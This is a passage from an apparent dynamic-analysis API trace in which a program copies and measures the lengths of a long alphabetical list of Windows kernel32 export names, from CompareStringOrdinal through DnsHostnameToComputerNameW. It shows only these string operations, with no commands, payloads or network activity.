lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.805] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.805] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.805] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.805] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.805] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.805] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.805] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.805] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.805] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.805] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.805] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.805] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.805] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.805] lstrlenA (lpString="COPYFILEA") returned 9 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.805] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.806] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.806] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.806] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.806] lstrlenA (lpString="COPYFILEW") returned 9 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.806] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.806] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.806] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.806] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.806] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.806] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.806] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.806] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.807] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.807] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.807] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.807] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.807] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.807] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.807] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.807] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.807] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.807] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.807] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.807] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.807] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.807] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.807] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.808] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.808] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.808] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.808] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.808] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.808] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.808] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.808] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.808] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.808] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.808] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.808] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.808] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.808] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.808] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.808] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.808] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.808] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.809] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.809] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.809] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.809] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.809] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.809] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.809] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.809] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.809] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.809] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.809] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.809] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.809] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.809] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.809] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.809] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.809] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.809] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.810] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.810] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.810] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.810] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.810] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.810] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.810] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.810] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.810] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.810] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.810] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.810] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.810] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.810] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.810] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.810] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.810] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.810] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.810] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.811] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.811] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.811] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.811] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.811] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.811] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.811] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.811] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.811] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.811] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.811] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.811] lstrlenA (lpString="DELETEATOM") returned 10 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.811] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.811] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.811] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.811] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.811] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.811] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.812] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.812] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.812] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.812] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.812] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.812] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.812] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.812] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.812] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.812] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.812] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.812] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.812] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") 